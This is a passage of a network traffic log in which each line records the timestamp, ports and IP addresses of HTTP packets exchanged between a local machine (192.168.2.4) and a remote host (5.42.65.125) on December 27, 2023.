Dec 27, 2023 17:57:25.797802925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.797836065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.797849894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.797849894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.798135042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.798176050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.798286915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.798326015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.798326969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.798340082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.798352957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.798377037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.798378944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.798393011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.798403978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.798418999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.798440933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.799191952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.799249887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.799263000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.799273968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.799288034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.799307108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.799328089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.799341917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.799354076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.799381018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.800051928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.800097942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.800112963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.800126076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.800137997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.800163984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.800164938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.800178051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.800189972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.800209045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.800239086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.801028967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.801044941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.801057100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.801069021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.801080942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.801093102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.801096916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.801105022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.801107883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.801131010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.801780939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.801795959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.801824093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.801861048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.801873922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.801884890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.801906109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.801913023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.801919937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.801929951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.801959038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.802665949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.802680016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.802694082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.802722931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.802737951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.802788973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.802792072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.802803993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.802817106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.802839994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.803551912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.803565979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.803579092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.803610086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.803622007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.803656101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.803668976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.803680897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.803694010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.803719997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.803740978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.804411888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.804541111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.804555893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.804584980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.804594994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.804609060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.804620981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.804636002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.804655075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.804672956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.804677963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.805449009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.805464029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.805478096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.805490971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.805497885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.805519104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.805537939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.805553913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.805571079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.805584908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.805597067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.805625916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.805639982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.806340933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.806355953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.806368113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.806380987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.806394100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.806396961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.806420088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.806487083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.806555033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.806567907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.806596041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.806612968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.807590961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.807626009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.807638884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.807652950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.807665110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.807672024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.807684898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.807694912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.807720900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.807745934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.807760000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.807796001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.808290958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.808305025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.808316946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.808340073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.808414936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.808451891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.808470011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.808542013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.808557034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.808568954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.808592081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.808609009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.809256077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.809299946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.809314013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.809345007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.809372902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.809386969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.809401989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.809413910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.809428930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.809442043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.809463978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.809499979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.810151100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.810197115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.810210943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.810276985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.810559988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.810575962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.810604095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.810625076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.810638905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.810653925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.810663939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.810681105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.810688972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.810694933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.810708046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.810751915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.811527967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.811542988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.811554909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.811568022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.811590910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.811608076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.811629057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.811642885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.811655045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.811667919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.811683893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.811697960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.812499046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.812535048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.812549114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.812562943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.812577009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.812589884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.812594891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.812604904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.812621117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.812621117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.812647104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.813415051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.813429117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.813457012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.813477039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.813489914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.813517094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.813519001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.813532114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.813555956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.813559055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.813572884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.813595057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.814397097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.814410925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.814423084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.814435005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.814486980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.814492941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.814522028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.814536095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.814547062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.814558983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.814584017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.815320015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.815352917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.815396070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.815418959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.815433025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.815448046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.815459967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.815483093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.815485001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.815500975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.815507889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.815525055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.816286087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.816299915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.816344023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.816433907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.816488028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.816526890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.816540956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.816553116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.816566944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.816581964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.816589117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.816595078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.816607952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.816607952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.816641092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.817404985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.817429066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.817444086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.817452908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.817480087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.817481041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.817555904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.817569971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.817581892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.817595005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.817595005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.817617893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.818346024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.818380117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.818393946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.818427086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.818439960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.818447113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.818454981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.818468094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.818484068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.818509102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.818509102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.818531036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.819395065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.819407940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.819421053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.819432974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.819447994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.819458008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.819459915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.819473028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.819473982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.819488049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.819493055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.819511890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.820142984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.820184946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.820192099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.820200920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.820214033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.820226908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.820262909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.820276022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.820280075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.820327044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.820339918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.820365906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.821100950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.821139097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.821151972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.821165085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.821185112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.821208000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.821222067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.821237087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.821249008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.821260929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.821269035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.821295977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.822031975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.822067022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.822084904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.822120905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.822151899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.822165012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.822191954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.822207928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.822212934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.822225094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.822253942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.822266102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.822272062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.822278976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.822304964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.823137045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.823151112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.823172092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.823184967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.823196888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.823210001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.823215961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.823224068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.823239088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.823241949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.823265076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.824053049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.824067116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.824076891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.824089050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.824100971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.824114084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.824112892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.824126959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.824131012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.824142933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.824142933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.824181080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.825023890 CET	80	49738	5.42.65.125	192.168.2.4
